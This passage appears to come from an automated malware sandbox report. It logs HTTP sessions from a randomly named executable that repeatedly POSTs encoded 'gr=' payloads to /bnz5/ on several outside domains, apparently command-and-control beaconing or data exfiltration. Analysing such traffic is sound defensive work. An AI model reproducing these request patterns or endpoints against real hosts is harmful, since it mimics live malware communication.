                                                                                                      Data Raw: 67 72 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 37 53 53 71 4e 32 68 63 4f 42 6c 79 64 56 32 55 46 4a 41 69 62 46 6c 65 36 32 73 6d 6a 47 75 6e 43 49 37 75 77 75 77 4a 56 6b 46 2b 51 55 6b 6d 53 50 67 32 52 74 4e 56 6b 75 47 57 6e 63 52 72 68 55 6a 2f 66 76 33 79 4e 55 62 4e 44 76 55 6e 4c 6c 71 44 48 38 2b 48 37 69 6b 6b 65 38 42 4c 32 4a 59 51 59 57 48 75 6e 2f 71 37 71 6b 64 31 52 42 63 45 57 48 34 4f 55 71 35 64 31 53 63 70 44 61 76 63 30 6b 31 73 73 65 52 4c 34 62 31 4e 52 6e 78 58 52 5a 5a 2b 74 63 68 53 36 49 43 4b 6c 32 69 6b 49 7a 5a 2b 56 42 65 43 30 70 69 2f 43 46 4a 6b 36 7a 31 4e 2b 41 58 52 61 6a 4a 57 4f 78 48 65 56 38 76 63 31 39 6c 51 67 70 69 47
                                                                                                      Data Ascii: gr=U5lbigM/lzYT7SSqN2hcOBlydV2UFJAibFle62smjGunCI7uwuwJVkF+QUkmSPg2RtNVkuGWncRrhUj/fv3yNUbNDvUnLlqDH8+H7ikke8BL2JYQYWHun/q7qkd1RBcEWH4OUq5d1ScpDavc0k1sseRL4b1NRnxXRZZ+tchS6ICKl2ikIzZ+VBeC0pi/CFJk6z1N+AXRajJWOxHeV8vc19lQgpiG
                                                                                                      Apr 16, 2024 11:59:42.243251085 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:42 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.54972091.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 11:59:44.885751009 CEST1764OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 37 53 53 71 4e 32 68 63 4f 42 6c 79 64 56 32 55 46 4a 41 69 62 46 6c 65 36 32 73 6d 6a 47 32 6e 43 36 7a 75 2f 74 59 4a 55 6b 46 2b 5a 30 6b 6e 53 50 67 52 52 75 38 64 6b 75 4b 47 6e 61 56 72 68 32 72 2f 58 2b 33 79 45 55 62 4e 42 76 55 69 55 31 71 57 48 36 65 59 37 6d 49 6b 65 38 42 4c 32 4d 55 51 65 45 76 75 38 2f 71 34 6a 45 64 68 44 78 63 73 57 44 55 77 55 71 38 69 30 6a 38 70 44 36 66 63 37 79 42 73 6c 65 52 4a 37 62 31 46 52 6e 73 50 52 59 30 53 74 63 39 38 36 50 47 4b 30 77 66 2f 53 79 67 70 45 77 65 5a 32 72 43 62 62 69 31 48 38 42 70 35 7a 6a 2f 55 66 6a 4d 35 4e 42 79 63 58 39 69 67 67 4c 31 46 68 4d 2f 77 4a 6b 4c 6d 67 6a 78 4c 45 63 47 31 71 31 30 46 34 63 75 62 56 50 70 51 44 6d 62 57 4b 6e 77 79 6a 33 74 69 65 67 53 74 41 55 75 6c 33 4e 58 49 69 35 72 73 69 54 44 75 51 67 4f 72 6f 65 71 4e 45 50 59 56 42 57 63 37 70 46 48 59 46 4e 54 35 57 4f 59 43 73 58 63 36 71 4a 34 4c 68 33 35 4a 53 32 45 47 47 39 30 30 71 64 58 46 74 47 6b 37 6c 64 70 79 41 66 4a 50 59 69 2b 55 37 48 51 64 32 36 38 47 4a 69 6b 72 51 37 4c 30 46 46 70 33 52 6c 4b 79 69 47 30 66 6c 57 53 71 4e 39 76 33 51 31 58 71 56 38 61 30 51 48 68 49 76 30 72 46 69 54 6e 59 31 38 44 74 33 4d 79 72 2f 51 66 50 36 56 34 34 77 55 76 38 32 4d 65 37 73 69 30 5a 70 53 55 50 2b 41 49 70 36 4d 72 66 55 76 73 62 71 70 7a 70 4b 66 36 41 33 46 42 4f 39 41 59 6f 61 43 6f 4b 71 31 2f 62 4f 6a 4b 72 58 39 45 31 61 55 5a 43 2b 78 4a 6d 2b 78 52 61 4d 4c 77 6f 32 69 62 59 6f 65 66 5a 41 75 42 63 56 56 2f 5a 6e 62 63 31 48 2f 37 6b 2b 4d 6a 73 42 38 70 53 79 68 70 59 48 44 5a 64 77 6e 42 30 73 2f 68 63 52 33 62 79 4c 61 4f 64 76 6e 46 46 50 72 72 4f 69 4a 6a 6b 35 32 79 41 33 77 69 33 74 44 46 36 70 4f 32 61 4e 50 34 46 4e 4e 31 35 34 66 35 64 79 78 31 4a 43 4f 79 74 33 6b 78 41 66 67 55 77 62 2f 4f 78 4d 6f 76 61 51 52 6b 69 47 51 6f 6d 7a 39 77 62 45 5a 4d 6f 79 4d 42 67 6a 6e 78 32 7a 52 59 67 42 5a 4c 44 79 4b 73 4a 5a 4b 4e 6d 2f 47 67 61 72 78 45 7a 62 70 33 73 75 61 62 52 4a 73 61 66 72 32 36 71 66 56 42 66 6d 58 6c 4a 50 54 68 68 46 38 63 43 78 55 57 6a 6f 4b 52 69 4b 5a 68 4f 6c 4b 70 39 5a 75 61 30 76 34 4f 34 53 74 73 6f 78 6d 35 37 69 36 4b 73 4b 30 66 74 33 71 6a 52 47 38 70 76 62 55 47 70 52 73 49 30 53 4e 4a 50 61 45 37 68 42 67 78 4a 7a 4d 61 49 33 48 38 42 69 6d 69 2b 31 67 75 37 48 4c 56 47 2f 58 78 32 34 6d 59 2b 59 74 62 2f 7a 46 4a 35 41 4c 36 6b 6a 78 70 56 51 36 47 6d 2b 50 75 61 55 43 56 73 6b 2f 54 42 43 71 6c 50 63 48 30 35 4e 59 78 6c 65 62 31 39 65 4b 65 58 6d 42 79 53 59 79 4b 7a 55 48 4e 38 41 58 61 50 47 37 35 6a 45 48 67 4a 58 41 4d 70 65 43 70 35 49 49 55 77 78 49 55 7a 75 70 59 62 50 44 45 50 2f 77 6b 45 2b 4a 67 56 4c 37 77 49 78 52 79 6c 71 39 35 78 50 6b 46 56 33 44 6e 44 6b 30 46 2f 50 34 62 71 31 6a 6b 6e 6c 56 38 49 4e 74 6c 61 62 34 49 79 6b 69 6a 65 59 51 45 42 43 34 46 64 4a 53 59 56 42 52 61 4f 51 64 61 4b 71 33 35 41 6e 62 2f 31 59 46 4d 58 4d 52 66 77 48 79 38 65 55 63 31 36 62 57 41 44 74 66 42 32 47 32 33 76 32 35 4b 31 55 76 2b 4d 69 6f 75 6e 46 6b 44 6b 50 78 49 59 4e 64 77 45 46 4a 50 45 58 6f 70 61 2b 4c 4d 6f 51 68 67 41 34 50 56 71 74 6d 69 61 37 49 2f 2b 33 65 68 6c 4a 4c 41 2f 35 71 6a 2f 51 77 47 4e 74 4c 78 42 49 44 6f 55 76 46 75 65 6b 41 64 78 58 37 6d 42 61 44 5a 53 66 65 77 47 32 6b 49 46 69 6f 6a 69 4b 69 52 30 38 50 34 57 53 61 36 6c 36 64 31 4c 35 72 6d 43 6c 61 38 4a 59 32 49 2b 48 47 37 4d 58 51 4c 55 32 73 55 30 79 6b 50 6e 58 4d 4c 61 30 59 2b 41 42 35 4e 7a 77 6c 7a 6f 6d 4f 55 64 51 2f 33 58 79 70 79 6d 36 64 64 72 6d 68 70 56 46 54 45 69 55 41 76 4f 44 31 49 73 61 52 2f 6d 48 56 6b 56 53 75 31 4c 52 73 78 6f 66 6c 32 48 39 65 65 70 70 4b 42 52 44 43 66 6f 58 6b 50 53 71 51 3d 3d
                                                                                                      Data Ascii: gr=U5lbigM/lzYT7SSqN2hcOBlydV2UFJAibFle62smjG2nC6zu/tYJUkF+Z0knSPgRRu8dkuKGnaVrh2r/X+3yEUbNBvUiU1qWH6eY7mIke8BL2MUQeEvu8/q4jEdhDxcsWDUwUq8i0j8pD6fc7yBsleRJ7b1FRnsPRY0Stc986PGK0wf/SygpEweZ2rCbbi1H8Bp5zj/UfjM5NBycX9iggL1FhM/wJkLmgjxLEcG1q10F4cubVPpQDmbWKnwyj3tiegStAUul3NXIi5rsiTDuQgOroeqNEPYVBWc7pFHYFNT5WOYCsXc6qJ4Lh35JS2EGG900qdXFtGk7ldpyAfJPYi+U7HQd268GJikrQ7L0FFp3RlKyiG0flWSqN9v3Q1XqV8a0QHhIv0rFiTnY18Dt3Myr/QfP6V44wUv82Me7si0ZpSUP+AIp6MrfUvsbqpzpKf6A3FBO9AYoaCoKq1/bOjKrX9E1aUZC+xJm+xRaMLwo2ibYoefZAuBcVV/Znbc1H/7k+MjsB8pSyhpYHDZdwnB0s/hcR3byLaOdvnFFPrrOiJjk52yA3wi3tDF6pO2aNP4FNN154f5dyx1JCOyt3kxAfgUwb/OxMovaQRkiGQomz9wbEZMoyMBgjnx2zRYgBZLDyKsJZKNm/GgarxEzbp3suabRJsafr26qfVBfmXlJPThhF8cCxUWjoKRiKZhOlKp9Zua0v4O4Stsoxm57i6KsK0ft3qjRG8pvbUGpRsI0SNJPaE7hBgxJzMaI3H8Bimi+1gu7HLVG/Xx24mY+Ytb/zFJ5AL6kjxpVQ6Gm+PuaUCVsk/TBCqlPcH05NYxleb19eKeXmBySYyKzUHN8AXaPG75jEHgJXAMpeCp5IIUwxIUzupYbPDEP/wkE+JgVL7wIxRylq95xPkFV3DnDk0F/P4bq1jknlV8INtlab4IykijeYQEBC4FdJSYVBRaOQdaKq35Anb/1YFMXMRfwHy8eUc16bWADtfB2G23v25K1Uv+MiounFkDkPxIYNdwEFJPEXopa+LMoQhgA4PVqtmia7I/+3ehlJLA/5qj/QwGNtLxBIDoUvFuekAdxX7mBaDZSfewG2kIFiojiKiR08P4WSa6l6d1L5rmCla8JY2I+HG7MXQLU2sU0ykPnXMLa0Y+AB5NzwlzomOUdQ/3Xypym6ddrmhpVFTEiUAvOD1IsaR/mHVkVSu1LRsxofl2H9eeppKBRDCfoXkPSqQ==
                                                                                                      Apr 16, 2024 11:59:45.097322941 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:44 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.54972191.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 11:59:47.622231007 CEST456OUTGET /bnz5/?gr=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVC0ntJKIXA1qlQqDuwiNLRNgNzKASDET1ivmJ23BpeRNTPw==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 11:59:47.834570885 CEST107INHTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 09:59:47 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.54972391.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 11:59:53.360054016 CEST733OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.collegeclubapparel.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.collegeclubapparel.com
                                                                                                      Referer: http://www.collegeclubapparel.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 70 39 5a 43 55 71 4b 67 50 69 4e 56 35 32 69 66 69 6c 48 44 69 34 2b 69 35 48 51 47 45 42 33 4b 56 58 7a 33 53 77 45 31 4d 37 4a 74 68 4d 6d 78 30 64 47 51 69 4a 4a 57 41 6a 47 32 51 53 66 71 51 4d 54 6f 33 63 36 2f 34 58 66 66 2f 4f 6b 53 59 6e 55 2f 69 37 71 61 75 4c 73 55 72 41 2b 45 7a 68 75 51 36 77 59 69 73 4c 76 62 6e 76 56 4d 34 58 68 71 35 39 5a 48 65 33 32 38 65 32 46 45 39 49 36 34 51 2b 76 42 46 43 44 62 74 55 4c 79 66 59 4c 77 46 54 6d 58 46 54 4c 4b 69 35 61 35 49 6c 5a 63 54 5a 66 52 34 67 33 61 48 30 49 77 78 2f 4e 77 42 4f 44 35 74 47 48 5a 52 76 52 54 7a 35 70 41 31 2b 73 3d
                                                                                                      Data Ascii: gr=p9ZCUqKgPiNV52ifilHDi4+i5HQGEB3KVXz3SwE1M7JthMmx0dGQiJJWAjG2QSfqQMTo3c6/4Xff/OkSYnU/i7qauLsUrA+EzhuQ6wYisLvbnvVM4Xhq59ZHe328e2FE9I64Q+vBFCDbtULyfYLwFTmXFTLKi5a5IlZcTZfR4g3aH0Iwx/NwBOD5tGHZRvRTz5pA1+s=
                                                                                                      Apr 16, 2024 11:59:53.572321892 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:53 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.54972491.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 11:59:56.089665890 CEST753OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.collegeclubapparel.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.collegeclubapparel.com
                                                                                                      Referer: http://www.collegeclubapparel.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 70 39 5a 43 55 71 4b 67 50 69 4e 56 6a 58 53 66 6a 47 76 44 71 34 2b 68 31 6e 51 47 4e 68 33 4f 56 58 76 33 53 78 77 6c 4e 4e 68 74 67 74 36 78 31 63 47 51 6c 4a 4a 57 4c 44 47 7a 55 53 66 68 51 4d 50 47 33 64 71 2f 34 54 2f 66 2f 4c 59 53 59 51 49 38 7a 37 71 63 33 62 73 57 76 41 2b 45 7a 68 75 51 36 78 70 48 73 4c 6e 62 67 66 6c 4d 34 79 4e 70 30 64 5a 41 62 33 32 38 4d 47 45 44 39 49 36 67 51 37 33 6e 46 42 72 62 74 57 54 79 66 4c 53 6d 65 44 6d 52 61 44 4c 66 6c 72 62 52 48 54 73 63 52 34 79 49 67 7a 72 56 43 43 6c 61 72 64 46 59 53 75 76 42 39 56 50 75 41 66 77 36 70 61 35 77 72 70 34 64 75 45 46 6f 70 65 49 35 49 78 6a 31 65 34 66 30 78 70 74 31
                                                                                                      Data Ascii: gr=p9ZCUqKgPiNVjXSfjGvDq4+h1nQGNh3OVXv3SxwlNNhtgt6x1cGQlJJWLDGzUSfhQMPG3dq/4T/f/LYSYQI8z7qc3bsWvA+EzhuQ6xpHsLnbgflM4yNp0dZAb328MGED9I6gQ73nFBrbtWTyfLSmeDmRaDLflrbRHTscR4yIgzrVCClardFYSuvB9VPuAfw6pa5wrp4duEFopeI5Ixj1e4f0xpt1
                                                                                                      Apr 16, 2024 11:59:56.301956892 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:56 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
